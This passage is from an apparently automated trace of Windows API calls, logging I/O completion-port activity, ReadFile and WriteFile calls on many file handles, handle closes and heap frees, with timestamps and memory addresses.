dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 0 [0158.217] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3510020) returned 1 [0158.217] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0158.218] ReadFile (in: hFile=0x198, lpBuffer=0x2690124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2aaf9e0, lpOverlapped=0x2690020 | out: lpBuffer=0x2690124, lpNumberOfBytesRead=0x2aaf9e0*=0x0, lpOverlapped=0x2690020) returned 0x0 [0158.218] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0158.218] ReadFile (in: hFile=0x1d8, lpBuffer=0x35a0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2aaf9e0, lpOverlapped=0x35a0020 | out: lpBuffer=0x35a0124, lpNumberOfBytesRead=0x2aaf9e0*=0x0, lpOverlapped=0x35a0020) returned 0x0 [0158.218] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 0 [0158.218] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2b70020) returned 1 [0158.218] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 0 [0158.218] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3630020) returned 1 [0158.218] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0158.218] WriteFile (in: hFile=0x19c, lpBuffer=0x710094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2aaf9e0, lpOverlapped=0x710020 | out: lpBuffer=0x710094*, lpNumberOfBytesWritten=0x2aaf9e0, lpOverlapped=0x710020) returned 1 [0158.218] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0158.218] WriteFile (in: hFile=0x1cc, lpBuffer=0x3510094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2aaf9e0, lpOverlapped=0x3510020 | out: lpBuffer=0x3510094*, lpNumberOfBytesWritten=0x2aaf9e0, lpOverlapped=0x3510020) returned 1 [0158.218] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 0 [0158.218] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2690020) returned 1 [0158.219] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 0 [0158.219] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x35a0020) returned 1 [0158.219] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0158.219] WriteFile (in: hFile=0x1ac, lpBuffer=0x2b70094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2aaf9e0, lpOverlapped=0x2b70020 | out: lpBuffer=0x2b70094*, lpNumberOfBytesWritten=0x2aaf9e0, lpOverlapped=0x2b70020) returned 1 [0158.219] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0158.219] WriteFile (in: hFile=0x1a0, lpBuffer=0x3630094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2aaf9e0, lpOverlapped=0x3630020 | out: lpBuffer=0x3630094*, lpNumberOfBytesWritten=0x2aaf9e0, lpOverlapped=0x3630020) returned 1 [0158.219] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0158.219] CloseHandle (hObject=0x19c) returned 1 [0158.220] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x710020) returned 1 [0158.221] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0158.221] CloseHandle (hObject=0x1cc) returned 1 [0158.222] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3510020) returned 1 [0158.225] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0158.225] WriteFile (in: hFile=0x198, lpBuffer=0x2690094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2aaf9e0, lpOverlapped=0x2690020 | out: lpBuffer=0x2690094*, lpNumberOfBytesWritten=0x2aaf9e0, lpOverlapped=0x2690020) returned 1 [0158.226] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0158.226] WriteFile (in: hFile=0x1d8, lpBuffer=0x35a0094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2aaf9e0, lpOverlapped=0x35a0020 | out: lpBuffer=0x35a0094*, lpNumberOfBytesWritten=0x2aaf9e0, lpOverlapped=0x35a0020) returned 1 [0158.226] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0158.226] CloseHandle (hObject=0x1ac) returned 1 [0158.228] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x2b70020) returned 1 [0158.231] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0158.231] CloseHandle (hObject=0x1a0) returned 1 [0158.232] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3630020) returned 1 [0158.235] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0158.235] CloseHandle (hObject=0x198) returned 1 [0158.236] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x2690020) returned 1 [0158.270] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0158.270] CloseHandle (hObject=0x1d8) returned 1 [0158.570] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x35a0020) returned 1 [0158.644] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0158.716] WriteFile (in: hFile=0x1cc, lpBuffer=0x3480124, nNumberOfBytesToWrite=0x276e, lpNumberOfBytesWritten=0x2aaf9e0, lpOverlapped=0x3480020 | out: lpBuffer=0x3480124, lpNumberOfBytesWritten=0x2aaf9e0, lpOverlapped=0x3480020) returned 0x0 [0158.719] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 0 [0158.732] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2690020) returned 1 [0158.732] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0159.431] ReadFile (in: hFile=0x19c, lpBuffer=0x710124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2aaf9e0, lpOverlapped=0x710020 | out: lpBuffer=0x710124, lpNumberOfBytesRead=0x2aaf9e0*=0x0, lpOverlapped=0x710020) returned 0x0 [0159.431] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0159.431] WriteFile (in: hFile=0x1d4, lpBuffer=0x3990124*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x2aaf9e0, lpOverlapped=0x3990020 | out: lpBuffer=0x3990124*, lpNumberOfBytesWritten=0x2aaf9e0, lpOverlapped=0x3990020) returned 1 [0159.435] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0159.435] ReadFile (in: hFile=0x1ac, lpBuffer=0x3750124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2aaf9e0, lpOverlapped=0x3750020 | out: lpBuffer=0x3750124, lpNumberOfBytesRead=0x2aaf9e0*=0x0, lpOverlapped=0x3750020) returned 0x0 [0159.435] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0159.435] ReadFile (in: hFile=0x1f4, lpBuffer=0x3870124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2aaf9e0, lpOverlapped=0x3870020 | out: lpBuffer=0x3870124, lpNumberOfBytesRead=0x2aaf9e0*=0x0, lpOverlapped=0x3870020) returned 0x0 [0159.435] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0159.435] WriteFile (in: hFile=0x1f0, lpBuffer=0x3630094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2aaf9e0, lpOverlapped=0x3630020 | out: lpBuffer=0x3630094*, lpNumberOfBytesWritten=0x2aaf9e0, lpOverlapped=0x3630020) returned 1 [0159.440] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0159.440] WriteFile (in: hFile=0x1f4, lpBuffer=0x3870094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2aaf9e0, lpOverlapped=0x3870020 | out: lpBuffer=0x3870094*, lpNumberOfBytesWritten=0x2aaf9e0, lpOverlapped=0x3870020) returned 1 [0159.450] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0159.450] CloseHandle (hObject=0x1f0) returned 1 [0159.464] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3630020) returned 1 [0159.467] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0160.426] WriteFile (in: hFile=0x1a8, lpBuffer=0x37e0124*, nNumberOfBytesToWrite=0x53a3, lpNumberOfBytesWritten=0x2aaf9e0, lpOverlapped=0x37e0020 | out: lpBuffer=0x37e0124*, lpNumberOfBytesWritten=0x2aaf9e0, lpOverlapped=0x37e0020) returned 1 [0160.433] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0160.434] ReadFile (in: hFile=0x1ac, lpBuffer=0x2690124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2aaf9e0, lpOverlapped=0x2690020 | out: lpBuffer=0x2690124, lpNumberOfBytesRead=0x2aaf9e0*=0x0, lpOverlapped=0x2690020) returned 0x0 [0160.434] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0160.435] ReadFile (in: hFile=0x1a4, lpBuffer=0x3480124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2aaf9e0, lpOverlapped=0x3480020 | out: lpBuffer=0x3480124, lpNumberOfBytesRead=0x2aaf9e0*=0x0, lpOverlapped=0x3480020) returned 0x0 [0160.435] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0160.435] ReadFile (in: hFile=0x1e0, lpBuffer=0x35a0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2aaf9e0, lpOverlapped=0x35a0020 | out: lpBuffer=0x35a0124, lpNumberOfBytesRead=0x2aaf9e0*=0x0, lpOverlapped=0x35a0020) returned 0x0 [0160.435] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0160.435] ReadFile (in: hFile=0x19c, lpBuffer=0x36c0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2aaf9e0, lpOverlapped=0x36c0020 | out: lpBuffer=0x36c0124, lpNumberOfBytesRead=0x2aaf9e0*=0x0, lpOverlapped=0x36c0020) returned 0x0 [0160.435] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0160.435] ReadFile (in: hFile=0x1a8, lpBuffer=0x37e0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2aaf9e0, lpOverlapped=0x37e0020 | out: lpBuffer=0x37e0124, lpNumberOfBytesRead=0x2aaf9e0*=0x0, lpOverlapped=0x37e0020) returned 0x0 [0160.435] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0160.435] ReadFile (in: hFile=0x1f0, lpBuffer=0x3900124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2aaf9e0, lpOverlapped=0x3900020 | out: lpBuffer=0x3900124, lpNumberOfBytesRead=0x2aaf9e0*=0x0, lpOverlapped=0x3900020) returned 0x0 [0160.435] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 0 [0160.435] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2690020) returned 1 [0160.436] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 0 [0160.436] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3480020) returned 1 [0160.436] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 0 [0160.436] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x35a0020) returned 1 [0160.436] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 0 [0160.436] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x36c0020) returned 1 [0160.436] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 0 [0160.436] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x37e0020) returned 1 [0160.436] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 0 [0160.436] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3900020) returned 1 [0160.436] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0160.436] WriteFile (in: hFile=0x1ac, lpBuffer=0x2690094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2aaf9e0, lpOverlapped=0x2690020 | out: lpBuffer=0x2690094*, lpNumberOfBytesWritten=0x2aaf9e0, lpOverlapped=0x2690020) returned 1 [0160.460] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0160.460] WriteFile (in: hFile=0x1e0, lpBuffer=0x35a0094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2aaf9e0, lpOverlapped=0x35a0020 | out: lpBuffer=0x35a0094*, lpNumberOfBytesWritten=0x2aaf9e0, lpOverlapped=0x35a0020) returned 1 [0160.462] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0160.462] ReadFile (in: hFile=0x1a0, lpBuffer=0x3a20124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2aaf9e0, lpOverlapped=0x3a20020 | out: lpBuffer=0x3a20124, lpNumberOfBytesRead=0x2aaf9e0*=0x0, lpOverlapped=0x3a20020) returned 0x0 [0160.462] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0160.462] ReadFile (in: hFile=0x1e4, lpBuffer=0x3d80124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2aaf9e0, lpOverlapped=0x3d80020 | out: lpBuffer=0x3d80124*, lpNumberOfBytesRead=0x2aaf9e0*=0x0, lpOverlapped=0x3d80020) returned 1 [0160.462] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0160.462] ReadFile (in: hFile=0x194, lpBuffer=0x3b40124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2aaf9e0, lpOverlapped=0x3b40020 | out: lpBuffer=0x3b40124, lpNumberOfBytesRead=0x2aaf9e0*=0x0, lpOverlapped=0x3b40020) returned 0x0 [0160.462] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0160.462] ReadFile (in: hFile=0x1ec, lpBuffer=0x3c60124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2aaf9e0, lpOverlapped=0x3c60020 | out: lpBuffer=0x3c60124, lpNumberOfBytesRead=0x2aaf9e0*=0x0, lpOverlapped=0x3c60020) returned 0x0 [0160.462] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0160.462] CloseHandle (hObject=0x1ac) returned 1 [0160.472] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x2690020) returned 1 [0160.475] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 0 [0160.475] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3a20020) returned 1 [0160.475] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, 